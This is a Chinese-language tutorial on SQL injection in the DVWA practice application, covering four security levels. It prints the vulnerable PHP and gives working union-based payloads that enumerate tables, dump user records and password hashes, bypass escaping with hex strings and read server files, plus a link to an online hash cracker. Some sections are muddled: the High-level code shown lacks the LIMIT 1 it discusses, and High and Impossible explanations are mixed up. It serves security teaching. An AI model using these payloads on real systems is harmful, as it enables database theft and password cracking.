0
点赞
收藏
分享

微信扫一扫

一步一步学习DVWA--SQL Injection SQL注入(第六期)


SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。近期很火的大使馆接连被黑事件,据说黑客依靠的就是常见的SQL注入漏洞。

手工注入思路

自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面简要介绍手工注入(非盲注)的步骤。

1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据。

下面对四种级别的代码进行分析。

1、Low级别

服务器端核心代码

<?php 

if( isset( $_REQUEST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_REQUEST[ 'id' ]; 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Get values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

    mysqli_close($GLOBALS["___mysqli_ston"]); 


?> 

可以看到,Low级别的代码对来自客户端的参数id( $id = $_REQUEST[ 'id' ];)没有进行任何的检查与过滤,存在明显的SQL注入。

漏洞利用

现实攻击场景下,攻击者是无法看到后端代码的,所以下面的手工注入步骤是建立在无法看到源码的基础上。

1.判断是否存在注入,注入是字符型还是数字型

输入1,查询成功:

一步一步学习DVWA--SQL Injection SQL注入(第六期)_DVWA

输入2,得到

一步一步学习DVWA--SQL Injection SQL注入(第六期)_SQL_02

输入 1' or '1=2  得到下面的输出

一步一步学习DVWA--SQL Injection SQL注入(第六期)_mysql_03

返回了多个结果,说明存在字符型注入。

猜测SQL查询语句中的字段数

输入 1' or 1=1 order by 1 #,查询

一步一步学习DVWA--SQL Injection SQL注入(第六期)_安全测试_04

把数据库中的数据都查询出来了。

输入1' or 1=1 order by 2 #,一样能够查询出结果。

一步一步学习DVWA--SQL Injection SQL注入(第六期)_DVWA_05

核对两次结果,是否按照字段1或2排序了。

输入  1' or 1=1 order by 3 #查询时,报下面错误,说明没有3个字段,只有First name和Surname两个字段。

一步一步学习DVWA--SQL Injection SQL注入(第六期)_mysql_06

输入1' union select 1,2 #,确认字段顺序,从下图可以看出,First name是第一个字段,Suname是第二个字段。说明代码中SQL语句为select First name,Surname from 表 where ID=’id’……

一步一步学习DVWA--SQL Injection SQL注入(第六期)_安全测试_07

获取当前数据库

输入1' union select 1,database() #

一步一步学习DVWA--SQL Injection SQL注入(第六期)_SQL_08

这说明数据库名称为dvwa

查看数据库版本:1'  union select 1,version() #

查看当前数据库用户:1'  union select 1,user() #

查看当前用户是否为root:1' ord(mid(user(),1,1))=114

返回正常,则说明为root。

一步一步学习DVWA--SQL Injection SQL注入(第六期)_mysql_09

猜测库中的表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

出现如下图截图,则执行成功,得到库中存在两个表,guestbook,users

一步一步学习DVWA--SQL Injection SQL注入(第六期)_安全测试_10

 

如果报下面错误

Illegal mix of collations for operation 'UNION'

解决方案是,把对应的表和数据库属性设置为utf_general_ci

一步一步学习DVWA--SQL Injection SQL注入(第六期)_SQL_11

一步一步学习DVWA--SQL Injection SQL注入(第六期)_DVWA_12

获取表中的字段

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

执行结果:

一步一步学习DVWA--SQL Injection SQL注入(第六期)_mysql_13

 

说明users表中有8个字段,分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。

下载数据

1' or 1=1 union select group_concat(user_id,first_name,last_name), group_concat(password) from users #

一步一步学习DVWA--SQL Injection SQL注入(第六期)_mysql_14

把查询出的MD5密码,通过MD5解密,解析出密码,例如5f4dcc3b5aa765d61d8327deb882cf99  在线解密得到password


​​https://www.cmd5.com/​​



 


2、Medium级别

查看源代码

<?php 

if( isset( $_POST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); 

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Display values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 



// This is used later on in the index.php page 
// Setting it here so we can close the database connection in here like in the rest of the source scripts 
$query  = "SELECT COUNT(*) FROM users;"; 
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0]; 

mysqli_close($GLOBALS["___mysqli_ston"]); 
?> 

可以看到,Medium级别的代码利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,\,',",\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。

漏洞利用

虽然前端使用了下拉选择菜单,但我们依然可以通过抓包改参数,提交恶意构造的查询参数。

1.判断是否存在注入,注入是字符型还是数字型

抓包更改参数id为1' or 1=1 #

使用Fiddler抓到报文如下

POST ​​http://192.168.92.129/DVWA/vulnerabilities/sqli/​​ HTTP/1.1

Host: 192.168.92.129

Connection: keep-alive

Content-Length: 18

Cache-Control: max-age=0

Origin: ​​http://192.168.92.129​​

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: ​​http://192.168.92.129/DVWA/vulnerabilities/sqli/​​

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: security=medium; PHPSESSID=b0tk9dlreg5shs8jjourolhv5a

 

id=1&Submit=Submit

 

修改id为 id=1’ or 1=1 @Submit=Submit

提交报文,报错如下

一步一步学习DVWA--SQL Injection SQL注入(第六期)_SQL_15


 

抓包更改参数id为1 or 1=1 #,查询成功:

修改id为 id=1 or 1=1 @Submit=Submit再次提交,出现下面返回报文,则证明提交成功。

一步一步学习DVWA--SQL Injection SQL注入(第六期)_mysql_16

说明存在数字型注入。

(由于是数字型注入,服务器端的mysql_real_escape_string函数就形同虚设了,因为数字型注入并不需要借助引号。)

猜解SQL查询语句中的字段数

抓包更改参数id为1 order by 2 #,查询成功:

一步一步学习DVWA--SQL Injection SQL注入(第六期)_DVWA_17


抓包更改参数id为1 order by 3 #,报错:

一步一步学习DVWA--SQL Injection SQL注入(第六期)_DVWA_18

说明执行的SQL查询语句中只有两个字段,即这里的First name、Surname。

确定显示的字段顺序

抓包更改参数id为1 union select 1,2 #,查询成功:

一步一步学习DVWA--SQL Injection SQL注入(第六期)_DVWA_19

说明执行的SQL语句为select First name,Surname from 表 where ID=id...

获取当前数据库

抓包更改参数id为1 union select 1,database() #,查询成功:

一步一步学习DVWA--SQL Injection SQL注入(第六期)_安全测试_20

说明当前的数据库为dvwa。

获取数据库中的表抓包更改参数id为1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,查询成功:

一步一步学习DVWA--SQL Injection SQL注入(第六期)_安全测试_21

说明数据库dvwa中一共有两个表,guestbook与users。

获取表中的字段名抓包更改参数id为1 union select 1,group_concat(column_name) from information_schema.columns where table_name=’users ’#,查询失败:

一步一步学习DVWA--SQL Injection SQL注入(第六期)_mysql_22

这是因为单引号被转义了,变成了\’。可以利用16进制进行绕过,抓包更改参数id为1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #,查询成功:

一步一步学习DVWA--SQL Injection SQL注入(第六期)_mysql_23

说明users表中有8个字段,分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。

下载数据

抓包修改参数id为1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,查询成功:

一步一步学习DVWA--SQL Injection SQL注入(第六期)_SQL_24

 

3、High级别

服务器端核心代码

<?php 

if( isset( $_POST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); 

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Display values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 



// This is used later on in the index.php page 
// Setting it here so we can close the database connection in here like in the rest of the source scripts 
$query  = "SELECT COUNT(*) FROM users;"; 
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0]; 

mysqli_close($GLOBALS["___mysqli_ston"]); 
?> 

可以看到,与Medium级别的代码相比,High级别的只是在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。

输入:

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #输入界面如下:

一步一步学习DVWA--SQL Injection SQL注入(第六期)_SQL_25

说明也可以获取数据库中的表。为什么输出了两行

输入:

1 union select 1,group_concat(column_name) from information_schema.columns where table_name=’users ’#获得下面信息

一步一步学习DVWA--SQL Injection SQL注入(第六期)_安全测试_26

这限制了只输出第一行,无法进行攻击。

 

4、Impossible级别

<?php 

if( isset( $_GET[ 'Submit' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Get input 
    $id = $_GET[ 'id' ]; 

    // Was a number entered? 
    if(is_numeric( $id )) { 
        // Check the database 
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); 
        $data->bindParam( ':id', $id, PDO::PARAM_INT ); 
        $data->execute(); 
        $row = $data->fetch(); 

        // Make sure only 1 result is returned 
        if( $data->rowCount() == 1 ) { 
            // Get values 
            $first = $row[ 'first_name' ]; 
            $last  = $row[ 'last_name' ]; 

            // Feedback for end user 
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
        } 
    } 


// Generate Anti-CSRF token 
generateSessionToken(); 

?> 

可以看到,不可能的等级的代码采用了PDO技术,划清了代码与数据的界限,有效的SQL注入,同时也限定了输入必须为数字,且只有返回的查询结果数量为一时,才会成功输出,这样就有效地预防了“脱裤” ”,Anti-CSRFtoken机制的加入了进一步提高了安全性。

漏洞利用

虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。由于手工注入的过程与Low级别基本一样,直接最后一步演示下载数据。

输入1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,查询成功:

需要特别提到的是,High级别的查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,这样做的目的是为了防止一般的sqlmap注入,因为sqlmap在注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,也就没办法进一步注入。

查询操作系统信息

1' and 1=2 union all select @@global.version_compile_os from mysql.user #

and 1=2 union select 1,load_file(0x433a5c78616d70705c6874646f63735c696e6465782e68746d6c) --- C:\boot.in #

 

关注安全   关注作者

--------------------------------------------------------------------------------------------------------------------------------------------------------------

(完)

 

举报

相关推荐

0 条评论